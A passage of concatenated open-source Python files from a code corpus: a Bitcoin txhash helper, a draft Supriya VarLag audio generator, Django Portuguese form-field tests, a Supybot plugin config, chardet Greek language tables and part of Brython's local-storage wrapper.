:param hashcode: SIGHASH_ALL = 1, SIGHASH_NONE = 2, SIGHASH_SINGLE = 3, SIGHASH_ANYONECANPAY = 0x81
:return: a transaction hash (txid) in hexadecimal format
"""
if isinstance(tx, str) and re.match('^[0-9a-fA-F]*$', tx):
tx = changebase(tx, 16, 256)
# [::-1] means the same as the list in reverse order
if hashcode:
return double_sha256(from_string_to_bytes(tx) + encode(int(hashcode), 256, 4)[::-1])
else:
return safe_hexlify(bin_dbl_sha256(tx)[::-1])
def double_sha256(string):
"""
Do a double SHA256 hash on a string
:param string: A string
:return: The hash in hexadecimal format
"""
return safe_hexlify(bin_dbl_sha256(string))
| gpl-3.0 |
josiah-wolf-oberholtzer/supriya | etc/pending_ugens/VarLag.py | 2 | 6303 | import collections
from supriya.enums import CalculationRate
from supriya.ugens.Filter import Filter
class VarLag(Filter):
"""
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag
VarLag.ar()
"""
### CLASS VARIABLES ###
__documentation_section__ = None
__slots__ = ()
_ordered_input_names = collections.OrderedDict(
'source',
'time',
'curvature',
'warp',
'start',
)
_valid_calculation_rates = None
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
curvature=0,
source=None,
start=None,
time=0.1,
warp=5,
):
Filter.__init__(
self,
calculation_rate=calculation_rate,
curvature=curvature,
source=source,
start=start,
time=time,
warp=warp,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
curvature=0,
source=None,
start=None,
time=0.1,
warp=5,
):
"""
Constructs an audio-rate VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag
VarLag.ar()
Returns ugen graph.
"""
import supriya.synthdefs
calculation_rate = supriya.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
curvature=curvature,
source=source,
start=start,
time=time,
warp=warp,
)
return ugen
# def coeffs(): ...
@classmethod
def kr(
cls,
curvature=0,
source=None,
start=None,
time=0.1,
warp=5,
):
"""
Constructs a control-rate VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.kr(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag
VarLag.kr()
Returns ugen graph.
"""
import supriya.synthdefs
calculation_rate = supriya.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
curvature=curvature,
source=source,
start=start,
time=time,
warp=warp,
)
return ugen
# def magResponse(): ...
# def magResponse2(): ...
# def magResponse5(): ...
# def magResponseN(): ...
# def new1(): ...
# def scopeResponse(): ...
### PUBLIC PROPERTIES ###
@property
def curvature(self):
"""
Gets `curvature` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.curvature
0.0
Returns ugen input.
"""
index = self._ordered_input_names.index('curvature')
return self._inputs[index]
@property
def source(self):
"""
Gets `source` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.source
OutputProxy(
source=In(
bus=0.0,
calculation_rate=CalculationRate.AUDIO,
channel_count=1
),
output_index=0
)
Returns ugen input.
"""
index = self._ordered_input_names.index('source')
return self._inputs[index]
@property
def start(self):
"""
Gets `start` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.start
Returns ugen input.
"""
index = self._ordered_input_names.index('start')
return self._inputs[index]
@property
def time(self):
"""
Gets `time` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.time
0.1
Returns ugen input.
"""
index = self._ordered_input_names.index('time')
return self._inputs[index]
@property
def warp(self):
"""
Gets `warp` input of VarLag.
::
>>> source = supriya.ugens.In.ar(bus=0)
>>> var_lag = supriya.ugens.VarLag.ar(
... curvature=0,
... source=source,
... start=start,
... time=0.1,
... warp=5,
... )
>>> var_lag.warp
5.0
Returns ugen input.
"""
index = self._ordered_input_names.index('warp')
return self._inputs[index]
| mit |
ridfrustum/lettuce | tests/integration/lib/Django-1.3/tests/regressiontests/forms/localflavor/pt.py | 50 | 1063 | from django.contrib.localflavor.pt.forms import PTZipCodeField, PTPhoneNumberField
from utils import LocalFlavorTestCase
class PTLocalFlavorTests(LocalFlavorTestCase):
def test_PTZipCodeField(self):
error_format = [u'Enter a zip code in the format XXXX-XXX.']
valid = {
'3030-034': '3030-034',
'1003456': '1003-456',
}
invalid = {
'2A200': error_format,
'980001': error_format,
}
self.assertFieldOutput(PTZipCodeField, valid, invalid)
def test_PTPhoneNumberField(self):
error_format = [u'Phone numbers must have 9 digits, or start by + or 00']
valid = {
'917845189': '917845189',
'91 784 5189': '917845189',
'91 784 5189': '917845189',
'+351 91 111': '+35191111',
'00351873': '00351873',
}
invalid = {
'91 784 51 8': error_format,
'091 456 987 1': error_format,
}
self.assertFieldOutput(PTPhoneNumberField, valid, invalid)
| gpl-3.0 |
jeffmahoney/supybot | plugins/Quote/config.py | 15 | 2352 | ###
# Copyright (c) 2005, Daniel DiPaolo
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Quote', True)
Quote = conf.registerPlugin('Quote')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(Quote, 'someConfigVariableName',
# registry.Boolean(False, """Help for someConfigVariableName."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| bsd-3-clause |
musicrighter/CIS422-P2 | env/lib/python3.4/site-packages/pip/_vendor/requests/packages/chardet/langgreekmodel.py | 2763 | 12628 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
Latin7_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40
79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50
253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60
78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90
253,233, 90,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0
253,253,253,253,247,248, 61, 36, 46, 71, 73,253, 54,253,108,123, # b0
110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0
35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0
124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
win1253_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40
79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50
253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60
78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90
253,233, 61,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0
253,253,253,253,247,253,253, 36, 46, 71, 73,253, 54,253,108,123, # b0
110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0
35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0
124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.2851%
# first 1024 sequences:1.7001%
# rest sequences: 0.0359%
# negative sequences: 0.0148%
GreekLangModel = (
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0,
3,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,0,3,3,0,3,2,3,3,0,3,2,3,3,3,0,0,3,0,3,0,3,3,2,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,2,3,2,2,3,3,3,3,3,3,3,3,0,3,3,3,3,0,2,3,3,0,3,3,3,3,2,3,3,3,0,
2,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,2,1,3,3,3,3,2,3,3,2,3,3,2,0,
0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,2,3,3,0,
2,0,1,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,3,0,0,0,0,3,3,0,3,1,3,3,3,0,3,3,0,3,3,3,3,0,0,0,0,
2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,0,3,0,3,3,3,3,3,0,3,2,2,2,3,0,2,3,3,3,3,3,2,3,3,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,3,2,2,2,3,3,3,3,0,3,1,3,3,3,3,2,3,3,3,3,3,3,3,2,2,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,0,3,0,0,0,3,3,2,3,3,3,3,3,0,0,3,2,3,0,2,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,3,0,0,3,3,0,2,3,0,3,0,3,3,3,0,0,3,0,3,0,2,2,3,3,0,0,
0,0,1,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,0,3,2,3,3,3,3,0,3,3,3,3,3,0,3,3,2,3,2,3,3,2,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,2,3,2,3,3,3,3,3,3,0,2,3,2,3,2,2,2,3,2,3,3,2,3,0,2,2,2,3,0,
2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,0,3,3,3,2,3,3,0,0,3,0,3,0,0,0,3,2,0,3,0,3,0,0,2,0,2,0,
0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,0,0,0,3,3,0,3,3,3,0,0,1,2,3,0,
3,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,2,0,0,3,2,2,3,3,0,3,3,3,3,3,2,1,3,0,3,2,3,3,2,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,3,0,2,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,3,0,3,2,3,0,0,3,3,3,0,
3,0,0,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,0,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,2,0,3,2,3,0,0,3,2,3,0,
2,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,1,2,2,3,3,3,3,3,3,0,2,3,0,3,0,0,0,3,3,0,3,0,2,0,0,2,3,1,0,
2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,3,0,3,0,3,3,2,3,0,3,3,3,3,3,3,0,3,3,3,0,2,3,0,0,3,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,0,0,3,0,0,0,3,3,0,3,0,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,0,3,3,3,3,3,3,0,0,3,0,2,0,0,0,3,3,0,3,0,3,0,0,2,0,2,0,
0,0,0,0,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,3,0,3,0,2,0,3,2,0,3,2,3,2,3,0,0,3,2,3,2,3,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,2,3,3,3,3,3,0,0,0,3,0,2,1,0,0,3,2,2,2,0,3,0,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,2,0,3,0,3,0,3,3,0,2,1,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,3,3,3,0,3,3,3,3,3,3,0,2,3,0,3,0,0,0,2,1,0,2,2,3,0,0,2,2,2,0,
0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,0,0,2,3,3,3,2,3,0,0,1,3,0,2,0,0,0,0,3,0,1,0,2,0,0,1,1,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,3,1,0,3,0,0,0,3,2,0,3,2,3,3,3,0,0,3,0,3,2,2,2,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,3,3,3,0,0,3,0,0,0,0,2,0,2,3,3,2,2,2,2,3,0,2,0,2,2,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,3,3,3,2,0,0,0,0,0,0,2,3,0,2,0,2,3,2,0,0,3,0,3,0,3,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,3,2,3,3,2,2,3,0,2,0,3,0,0,0,2,0,0,0,0,1,2,0,2,0,2,0,
0,2,0,2,0,2,2,0,0,1,0,2,2,2,0,2,2,2,0,2,2,2,0,0,2,0,0,1,0,0,0,0,
0,2,0,3,3,2,0,0,0,0,0,0,1,3,0,2,0,2,2,2,0,0,2,0,3,0,0,2,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,0,2,3,2,0,2,2,0,2,0,2,2,0,2,0,2,2,2,0,0,0,0,0,0,2,3,0,0,0,2,
0,1,2,0,0,0,0,2,2,0,0,0,2,1,0,2,2,0,0,0,0,0,0,1,0,2,0,0,0,0,0,0,
0,0,2,1,0,2,3,2,2,3,2,3,2,0,0,3,3,3,0,0,3,2,0,0,0,1,1,0,2,0,2,2,
0,2,0,2,0,2,2,0,0,2,0,2,2,2,0,2,2,2,2,0,0,2,0,0,0,2,0,1,0,0,0,0,
0,3,0,3,3,2,2,0,3,0,0,0,2,2,0,2,2,2,1,2,0,0,1,2,2,0,0,3,0,0,0,2,
0,1,2,0,0,0,1,2,0,0,0,0,0,0,0,2,2,0,1,0,0,2,0,0,0,2,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,3,3,2,2,0,0,0,2,0,2,3,3,0,2,0,0,0,0,0,0,2,2,2,0,2,2,0,2,0,2,
0,2,2,0,0,2,2,2,2,1,0,0,2,2,0,2,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,
0,2,0,3,2,3,0,0,0,3,0,0,2,2,0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,0,2,
0,0,2,2,0,0,2,2,2,0,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,3,2,0,2,2,2,2,2,0,0,0,2,0,0,0,0,2,0,1,0,0,2,0,1,0,0,0,
0,2,2,2,0,2,2,0,1,2,0,2,2,2,0,2,2,2,2,1,2,2,0,0,2,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,2,0,2,0,2,2,0,0,0,0,1,2,1,0,0,2,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,3,2,3,0,0,2,0,0,0,2,2,0,2,0,0,0,1,0,0,2,0,2,0,2,2,0,0,0,0,
0,0,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,
0,2,2,3,2,2,0,0,0,0,0,0,1,3,0,2,0,2,2,0,0,0,1,0,2,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,0,2,0,3,2,0,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,2,0,0,0,0,1,1,0,0,2,1,2,0,2,2,0,1,0,0,1,0,0,0,2,0,0,0,0,0,0,
0,3,0,2,2,2,0,0,2,0,0,0,2,0,0,0,2,3,0,2,0,0,0,0,0,0,2,2,0,0,0,2,
0,1,2,0,0,0,1,2,2,1,0,0,0,2,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,1,2,0,2,2,0,2,0,0,2,0,0,0,0,1,2,1,0,2,1,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,3,1,2,2,0,2,0,0,0,0,2,0,0,0,2,0,0,3,0,0,0,0,2,2,2,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,1,0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,2,
0,2,2,0,0,2,2,2,2,2,0,1,2,0,0,0,2,2,0,1,0,2,0,0,2,2,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,0,0,0,0,2,0,2,0,0,0,0,2,
0,1,2,0,0,0,0,2,2,1,0,1,0,1,0,2,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,
0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,2,0,0,2,2,0,0,0,0,1,0,0,0,0,0,0,2,
0,2,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,
0,2,2,2,2,0,0,0,3,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,1,
0,0,2,0,0,0,0,1,2,0,0,0,0,0,0,2,2,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,
0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,2,2,2,0,0,0,2,0,0,0,0,0,0,0,0,2,
0,0,1,0,0,0,0,2,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
0,3,0,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,2,
0,0,2,0,0,0,0,2,2,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,2,0,2,2,1,0,0,0,0,0,0,2,0,0,2,0,2,2,2,0,0,0,0,0,0,2,0,0,0,0,2,
0,0,2,0,0,2,0,2,2,0,0,0,0,2,0,2,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,
0,0,3,0,0,0,2,2,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,0,0,
0,2,2,2,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,
0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,2,0,0,0,2,0,0,0,0,0,1,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,2,0,0,0,
0,2,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,2,0,2,0,0,0,
0,0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,1,2,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
Latin7GreekModel = {
'charToOrderMap': Latin7_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-7"
}
Win1253GreekModel = {
'charToOrderMap': win1253_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': False,
'charsetName': "windows-1253"
}
# flake8: noqa
| artistic-2.0 |
40223149/2015springcda | static/Brython3.1.1-20150328-091302/Lib/browser/local_storage.py | 617 | 2786 | # local storage in browser
import sys
from javascript import JSObject
class __UnProvided():
pass
class LocalStorage():
storage_type = "local_storage"
def __init__(self):
if not sys.has_local_storage:
raise EnvironmentError("LocalStorage not available")
self.store = JSObject(__BRYTHON__.local_storage)
def __delitem__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if key not in self:
raise KeyError(key)
self.store.removeItem(key)
def __getitem__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
res = __BRYTHON__.JSObject(self.store.getItem(key))
if res:
return res
raise KeyError(key)
def __setitem__(self, key, value):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if (not isinstance(value, str)):
raise TypeError("value must be string")
self.store.setItem(key, value)
# implement "in" functionality
def __contains__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
res = __BRYTHON__.JSObject(self.store.getItem(key))
if res is None:
return False
return True
def __iter__(self):
